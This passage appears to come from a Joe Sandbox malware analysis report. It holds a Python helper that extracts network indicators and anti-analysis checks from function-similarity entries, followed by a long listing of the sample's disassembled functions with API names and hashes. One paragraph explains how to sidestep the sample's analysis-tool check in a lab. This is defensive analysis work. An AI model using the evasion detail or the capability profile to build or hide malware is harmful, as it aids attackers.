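    carries an IPv4 address; that keeps unrelated counters out of the result.
    """
    routable, local, ports = set(), set(), set()
    for entry in entries:
        strings = entry.get("String ID", [])
        saw_ip = False
        for s in strings:
            try:
                ip = ipaddress.IPv4Address(s)
            except ipaddress.AddressValueError:
                continue  # not an IPv4 literal (e.g. "o1:", "Console", "6666")
            saw_ip = True
            (routable if ip.is_global else local).add(str(ip))
        if saw_ip:
            ports.update(int(s) for s in strings if s.isdigit() and 0 < int(s) <= 65535)
    return {"ipv4": sorted(routable), "non_routable": sorted(local), "ports": sorted(ports)}


def find_tool_checks(entries: List[dict]) -> List[dict]:
    """Functions that touch a window API and name two or more analysis tools."""
    hits = []
    for entry in entries:
        apis = " ".join(entry.get("API ID", []))
        tools = sorted(s for s in entry.get("String ID", []) if s in ANALYSIS_TOOLS)
        if "Window" in apis and len(tools) >= 2:
            hits.append({"opcode_id": entry.get("Opcode ID", ""), "tools": tools})
    return hits


if __name__ == "__main__":
    parsed = parse_similarity_entries(SAMPLE_REPORT)
    print(extract_network_iocs(parsed))
    for hit in find_tool_checks(parsed):
        print(hit["opcode_id"][:16], hit["tools"])
```

                           Run against the full function listing (not just the two embedded entries), the routable address and port set are what to pivot on in the report's network section; the loopback entry is kept separately because a 127.0.0.1 string in a configuration block is usually a default or test value, not a contact point. The tool-name hit is the function to watch when reproducing the sample in a lab: renaming analysis-tool windows, or running the tools on a different host, avoids triggering the check.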
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          • Opcode ID: 466eb3fc9af94d755cb386991d0adb2fb6d6ea7260ce2343ca81422ea1881359
                          • Instruction ID: 8765c084d8af3e124cb807ba5eacd4cdc2b7214a827d8b38d8a8bc4812824376
                          • Opcode Fuzzy Hash: 466eb3fc9af94d755cb386991d0adb2fb6d6ea7260ce2343ca81422ea1881359
                          • Instruction Fuzzy Hash: 13B1AC32741AA286FF54CB22D551BA933B3F74AB84F445539DE0A47B90EF38DA56C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWidelstrlensetsockopt$CreateEventIoctlgethostbynamesocket
                          • String ID:
                          • API String ID: 2536029566-0
                          • Opcode ID: 5b059df7fec4f1036d2111c5addf08278f51dd00cf6e6385f9234d437b58964f
                          • Instruction ID: 9c5b89d40a75de29fddc55550565723594d84b81037f694dff471e754c089540
                          • Opcode Fuzzy Hash: 5b059df7fec4f1036d2111c5addf08278f51dd00cf6e6385f9234d437b58964f
                          • Instruction Fuzzy Hash: 30515432614B9186F7249F65F480B9A77B7F788BA4F10522AEE9943B94DF3CC5468B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CreateFile$AttributesCommandErrorExitInfoLastLineModuleNameStartuplstrlen
                          • String ID: $WinSta0\Default$h
                          • API String ID: 3224050902-50515225
                          • Opcode ID: 9788b0c6b52746562918e6521d9e674a2c14dac563895690fbe095de6b773581
                          • Instruction ID: 5ade66342acb64f0b67e1602c55c911d4ef1e5608362cda7339d9086a133975f
                          • Opcode Fuzzy Hash: 9788b0c6b52746562918e6521d9e674a2c14dac563895690fbe095de6b773581
                          • Instruction Fuzzy Hash: 5341A431644AC282FB609B24F4847DEB3B3F784790F50523AEA5947B99EF3CC6568B00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: free$__free_lconv_mon__free_lconv_num_errno
                          • String ID:
                          • API String ID: 2822633559-0
                          • Opcode ID: 17f21d004e540957a027c9f4d461f3e374196ffda932605389c2d393b89cf90f
                          • Instruction ID: e798bfaf5c06fe67c18f44df73b8b6e47d86daeb11484f425a6411ac0b14df30
                          • Opcode Fuzzy Hash: 17f21d004e540957a027c9f4d461f3e374196ffda932605389c2d393b89cf90f
                          • Instruction Fuzzy Hash: A5411A301619898AFF99AB58C4A1FE973B6FF58344F7C007D941ACA2D2CB21DD92CB11
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                          • String ID:
                          • API String ID: 518839503-0
                          • Opcode ID: 8a5bcbf2f5b03e6271d90b4b13e59cdc641d44b15ea147a65484282a41bab39a
                          • Instruction ID: acb7339c71762d6e53053dc36f849fbf1ced5cdf1f59b967de879192c93b10da
                          • Opcode Fuzzy Hash: 8a5bcbf2f5b03e6271d90b4b13e59cdc641d44b15ea147a65484282a41bab39a
                          • Instruction Fuzzy Hash: 3D410D326426D285FF599F65D450BE92373EB84B85F496439DA094B2A5CF28CE828390
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _fileno$_errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 482796045-0
                          • Opcode ID: b0048c473e875f5361daaf0fd704adfa276cbcd020ef96e2e5c96f80651a0148
                          • Instruction ID: a3ac2d87b872ba6f9dae062dd99476613b357be62748e0111656ba71d058cc0a
                          • Opcode Fuzzy Hash: b0048c473e875f5361daaf0fd704adfa276cbcd020ef96e2e5c96f80651a0148
                          • Instruction Fuzzy Hash: BA51F6312945E241FB649B3BC5917FC2773A7467A4F14232AEA6A476D1EB2CCE138300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd$CreateFrameInfo
                          • String ID: csm
                          • API String ID: 4181383844-1018135373
                          • Opcode ID: f7c0f49ba4beedef2b7976ee9fce1622404532abdfe6423b84f5cde918012730
                          • Instruction ID: f673afed8ed3a994c3d3f48f6f3673fc9a26aefe03707b0f66abba1ddb6dc5c8
                          • Opcode Fuzzy Hash: f7c0f49ba4beedef2b7976ee9fce1622404532abdfe6423b84f5cde918012730
                          • Instruction Fuzzy Hash: 8C517170558A848FE7A4EF18C045BE9B3F5FF59311F28017DE48AC3662DB30E9428B82
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$CreateFrameInfo_amsg_exit
                          • String ID: csm
                          • API String ID: 2825728721-1018135373
                          • Opcode ID: ab259648624af678573ba89838dca0527dad1af5f5945908d59d38f32e1ff19f
                          • Instruction ID: 2e86a8a91b97a8e223385b694fed0f12118920e5ce7a8a3de2bda8d7842489f0
                          • Opcode Fuzzy Hash: ab259648624af678573ba89838dca0527dad1af5f5945908d59d38f32e1ff19f
                          • Instruction Fuzzy Hash: AE415D36544BC282E670AB12E440BEAB7B6F785B94F04523AEF9D07B85DF39C956C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 101574016-0
                          • Opcode ID: ee1a25ee45c2640c7852e1812db1e641d052142c21b4cb8a2d2def99178db119
                          • Instruction ID: 7e385534f2d2bbe3585619cadc4a76cb84b97aecc060e16b688d0b0888dc35e1
                          • Opcode Fuzzy Hash: ee1a25ee45c2640c7852e1812db1e641d052142c21b4cb8a2d2def99178db119
                          • Instruction Fuzzy Hash: 2DA1D231281BE285FA15AB16E910BE966B7FB80BD4F24A53C9E59477D5DF34CE438300
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalErrorLastSection$EnterLeave
                          • String ID:
                          • API String ID: 2124651672-0
                          • Opcode ID: f1cd334ff1bf03e48cfd9cd4b3e080a5c9426922d43e00ec9972468f940fc80e
                          • Instruction ID: 40d885cac5990621e7297c2d1291a2c6af0e8d9f567f45a3b5639c5094501b60
                          • Opcode Fuzzy Hash: f1cd334ff1bf03e48cfd9cd4b3e080a5c9426922d43e00ec9972468f940fc80e
                          • Instruction Fuzzy Hash: 07416E322802D68AF754AF25D588F9E73BBFB59791F01523A9A1783290DF38CD46C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterErrorLastLeave
                          • String ID:
                          • API String ID: 4082018349-0
                          • Opcode ID: f9e10af98ba3564db1dda6833011695fd4e85ea4eaf2b3d34699dd1ebcf9231e
                          • Instruction ID: 6d173fcdd5ea3bf7a4ce33c09462485fe7e306ee5b577ff168753604755d1c43
                          • Opcode Fuzzy Hash: f9e10af98ba3564db1dda6833011695fd4e85ea4eaf2b3d34699dd1ebcf9231e
                          • Instruction Fuzzy Hash: 3F3193303806D282F6146B26E9C5BE97373E765BA0F04923D9E66477D5DF28DD878700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CreateDeleteOpenlstrlen
                          • String ID: AppEvents$Network
                          • API String ID: 3197061591-3733486940
                          • Opcode ID: 32c959de67c7d378e92ef510da6cbe0d70bc71428da5d553c9f85ddad007468a
                          • Instruction ID: 07934d57612afba409887ac19e64c23437e473628a0d94323cf73a9edd34d21c
                          • Opcode Fuzzy Hash: 32c959de67c7d378e92ef510da6cbe0d70bc71428da5d553c9f85ddad007468a
                          • Instruction Fuzzy Hash: 65215C76314A8182FB10AB12F944B8AB372F794BE5F440126EE5907B58CFBCC64ADB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$Info
                          • String ID:
                          • API String ID: 1775632426-0
                          • Opcode ID: ba1efee0f892db86b8c289ae95d93411e85fb81a9820fec0fc76b2431202ca1c
                          • Instruction ID: c2d8eb8880a749331d632c99716f78e34bf95149d3bd0c391a3dcbc2ebe6cd69
                          • Opcode Fuzzy Hash: ba1efee0f892db86b8c289ae95d93411e85fb81a9820fec0fc76b2431202ca1c
                          • Instruction Fuzzy Hash: 8AA1C5727806E245FB729F15D800BEA6EF3B7447A4F48923AA96A477C5DB34CE42C340
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                          • String ID:
                          • API String ID: 1080698880-0
                          • Opcode ID: 57a05af81f985b0e377ceb1598bee9b74d02fc96113ccd60c581adf0dcb7ad62
                          • Instruction ID: 690c7a5f71eccc69ed72f77799a87f2c5c3001875e5f40de401591cdfccb6e99
                          • Opcode Fuzzy Hash: 57a05af81f985b0e377ceb1598bee9b74d02fc96113ccd60c581adf0dcb7ad62
                          • Instruction Fuzzy Hash: 37818D326407D28AFB249F26D440BDD76B7FB48BA4F545239EA5957BD4EB38CE028700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: String$CloseHandleProcess$FreeOpen$CurrentToken
                          • String ID:
                          • API String ID: 3697972778-0
                          • Opcode ID: 403ccc861227b449e0fde81aaec5a2f355ca415b91da956a830027824c60e844
                          • Instruction ID: 9f0049fa0e77eafbcd459bf31a43436a274fcb53202c60fa74f70851ff3eac45
                          • Opcode Fuzzy Hash: 403ccc861227b449e0fde81aaec5a2f355ca415b91da956a830027824c60e844
                          • Instruction Fuzzy Hash: 005187352416C282FE68AB11E890BE97373FB84B94F48813DDE99477A5DF38CE468740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 2295021086-0
                          • Opcode ID: 4da4875620b1f92b924daa6a931a778707caf5e849f7b64176c98afd523aee9e
                          • Instruction ID: 3e58d3fe072175ec79e598c7b80dfa0167c993d28fe3f72c841e794ea97e8ace
                          • Opcode Fuzzy Hash: 4da4875620b1f92b924daa6a931a778707caf5e849f7b64176c98afd523aee9e
                          • Instruction Fuzzy Hash: AB51D7726407E38AFB65DB26C441BEC26B3A740BA8F146239DA5547AD5EB3CCE438704
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                          • String ID: @
                          • API String ID: 3473179607-2766056989
                          • Opcode ID: 5e9121238b5210a1ea3159215a31185dcb12772a96a5da2caa2b43af4d344009
                          • Instruction ID: 5db7c232ec6712013b9bc2561b58d378b5d2cfb045c4339d451d39eedf520667
                          • Opcode Fuzzy Hash: 5e9121238b5210a1ea3159215a31185dcb12772a96a5da2caa2b43af4d344009
                          • Instruction Fuzzy Hash: 8D815976244BD286FB548F24D584BA937B3EB44B74F55A33DCA7A822D1DB38CA56C300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                          • String ID: ceil
                          • API String ID: 3411037476-3069211559
                          • Opcode ID: b5dd8a30d6b54562a72f65b778ed9eb5167f322a29820b7d336c5849ae73d17a
                          • Instruction ID: e53cd8864248b7de0575a7a1830227bc5af6d1b6e6cf24c141e72ca9f4774a9f
                          • Opcode Fuzzy Hash: b5dd8a30d6b54562a72f65b778ed9eb5167f322a29820b7d336c5849ae73d17a
                          • Instruction Fuzzy Hash: 5341B131296AD281F6509B26F940BD972B7F798B88F50103DEA4D437A4EF38CE578300
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEvent
                          • String ID:
                          • API String ID: 3019579578-0
                          • Opcode ID: 79e511864709ffbbde73a33bf69e271293399a6222738070655b22a36dfb0dad
                          • Instruction ID: e547e808bb784e5b2e02f268e01fd9ac8887f860660ddf6837885974b6f43d63
                          • Opcode Fuzzy Hash: 79e511864709ffbbde73a33bf69e271293399a6222738070655b22a36dfb0dad
                          • Instruction Fuzzy Hash: 0B4153321446C18BF7749B15E4907AEB3B3F3A4754F14523ADB8A43AA4DB78EE86C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterErrorLastLeave
                          • String ID:
                          • API String ID: 4082018349-0
                          • Opcode ID: d3e572e5e79f9f815d661d2295d7187d85695194ec046127c100848211dd9382
                          • Instruction ID: b3884703946b02938f06e6ed99855a06ac4644bd7469291f100a2d5eeda29e40
                          • Opcode Fuzzy Hash: d3e572e5e79f9f815d661d2295d7187d85695194ec046127c100848211dd9382
                          • Instruction Fuzzy Hash: F0314D326506C28AF7509F28D4C4B9D37B3FB64B48F54117ADA06866A5DF39CE8BC740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleWritelstrlenwsprintf
                          • String ID: %s %s
                          • API String ID: 2369136734-2939940506
                          • Opcode ID: 586a3a816ee8a111b5affe1204b7927bea72fa21104d559b43d04ba7da1764eb
                          • Instruction ID: bfad37dcd546c0eb361adffec60d28849b99b8774bedb6131cae3289bd33e848
                          • Opcode Fuzzy Hash: 586a3a816ee8a111b5affe1204b7927bea72fa21104d559b43d04ba7da1764eb
                          • Instruction Fuzzy Hash: 0E31CE312589D681FB709F21F494BDBB773F7D4794F44412A9A8942AA8DF38CE0ACB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2819658684-0
                          • Opcode ID: aaccad324fe5c70c5f9df746226d9364551112f4e2a8b53086705aa8a37d231d
                          • Instruction ID: 06cad3256470c076386c431705828d7e7d6ea3d1072e5d9e2856bf1977deccb5
                          • Opcode Fuzzy Hash: aaccad324fe5c70c5f9df746226d9364551112f4e2a8b53086705aa8a37d231d
                          • Instruction Fuzzy Hash: 4551D2325D0A998BFBE59B28C584BE936F2FB44711F14427DE585C66D2CB30CE86C781
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2819658684-0
                          • Opcode ID: c6f261f24af21140089df4e3039563bf3863edad6c6e4257521d5947174435c6
                          • Instruction ID: 0f404d5bcfc087cd2af7ec6c69fc41e0653fd15987c64b3ce2539dc457897e4b
                          • Opcode Fuzzy Hash: c6f261f24af21140089df4e3039563bf3863edad6c6e4257521d5947174435c6
                          • Instruction Fuzzy Hash: C3518E30550A9A9AFB659F98C484BE977F6FF44321F3C427D941BC61D2CB35CE428A42
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                          • String ID:
                          • API String ID: 1701177279-0
                          • Opcode ID: c42e260d004b3bc25826a470d31d1e4496d73dbccdd2e5f324cb076cb23d5860
                          • Instruction ID: ee8ace7b64920340e34e98270f4b7eac20fc641c67da75258e46e002c3123a67
                          • Opcode Fuzzy Hash: c42e260d004b3bc25826a470d31d1e4496d73dbccdd2e5f324cb076cb23d5860
                          • Instruction Fuzzy Hash: 8D513932240AC28AF7749F26E484BDD37B6F744B98F404029DA4A47B94EF78DA96C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$setsockopt$CreateCurrentEventResetThreadTimerWaitablefreemalloc
                          • String ID:
                          • API String ID: 3356772049-0
                          • Opcode ID: c2b72c0c646ab73e3ff6ad403e122b312f2e4904b90c25866ab9b8e9ab376b02
                          • Instruction ID: 43b5a1c0c6803778cb5ec72da0a92c0f2940db8f6dfb4dea4fd20668f76725ee
                          • Opcode Fuzzy Hash: c2b72c0c646ab73e3ff6ad403e122b312f2e4904b90c25866ab9b8e9ab376b02
                          • Instruction Fuzzy Hash: DC516A72200B829BF7549F25E58479D77B2F748788F10403AEB4987B90DF79DA668B40
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseCurrentSleepThreadTimeclosesocketsendshutdowntime
                          • String ID:
                          • API String ID: 929257074-0
                          • Opcode ID: 24b510512f13a46b6ad09972d22530b9cbeb376f452b7ede55be531369f4c3e4
                          • Instruction ID: 97a7ef79d0782c56234f947ee20215b280ae35822f217171a7ac464b1b892554
                          • Opcode Fuzzy Hash: 24b510512f13a46b6ad09972d22530b9cbeb376f452b7ede55be531369f4c3e4
                          • Instruction Fuzzy Hash: F8311A3265069286FB619F26E4D4B9C33B3F784F65F14023ADA69466D8CF38CD46C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
